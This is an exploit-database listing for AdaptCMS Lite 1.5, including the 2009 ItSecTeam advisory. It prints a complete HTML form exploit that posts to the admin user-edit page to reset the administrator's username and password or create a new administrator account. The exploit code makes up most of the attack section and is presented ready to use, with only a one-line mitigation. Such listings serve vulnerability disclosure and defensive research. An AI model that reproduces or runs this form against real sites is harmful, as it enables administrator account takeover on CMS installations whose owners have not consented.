header-logo
Suggest Exploit
vendor:
AdaptCMS Lite
by:
ItSecTeam
7.5
CVSS
HIGH
change admin (user,passwd) & add new admin user exploit
798
CWE
Product Name: AdaptCMS Lite
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

AdaptCMS_Lite_1.5

This exploit allows an attacker to change the admin username and password and add a new admin user in AdaptCMS Lite version 1.5. The attacker can modify the values in the HTML form to specify the new username, password, email, and level of the admin user.

Mitigation:

Update to a secure version of the software.
Source

Exploit-DB raw data:

===========================================================================
( #Topic : AdaptCMS_Lite_1.5 2009-07-07
( #Bug type : change admin (user,passwd) & add new admin user exploit
( #Download :
http://sourceforge.net/projects/adaptcms/files/AdaptCMS%20Lite%20v1/1.5/AdaptCMS_Lite_1.5.zip/download
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory:
www.ITSecTeam.com/en/vulnerabilities/vulnerability28.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!

---------------------------------------------------------------------
exploit:

<html>
<head>
<body>
<h2>coded by ahmadbady</h2>
<form action='admin.php?view=edit_users2&id=1' method='post'>
<table cellpadding='5' cellspacing='0' border='0' width='480'
style='padding-left:5px' align='left'>
<tr><td>Username</td><td><input type='text' name='username1' size='16'
value='anything'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td></tr><tr><td>New Password?</td><td><input type='text'
name='password1' size='16'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td></tr><tr><td>E-Mail</td><td><input type='text' name='email1'
size='16' value='anything'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td></tr><tr><td>Level</td><td><select name='level' style='font-family:
tahoma;
font-size: 11px; border: 1px solid #444444;padding-left:1px'><option
value='Admin'
selected>Admin - Level 1</option><option value='Member'>Member - Level
3</option>
<option value='Staff'>Staff - Level 2</option></select></td></tr><tr><td>
<input type='submit' value='Update User'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td>
</tr></table></form> </td></tr></table>
</body>
</html>
---------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR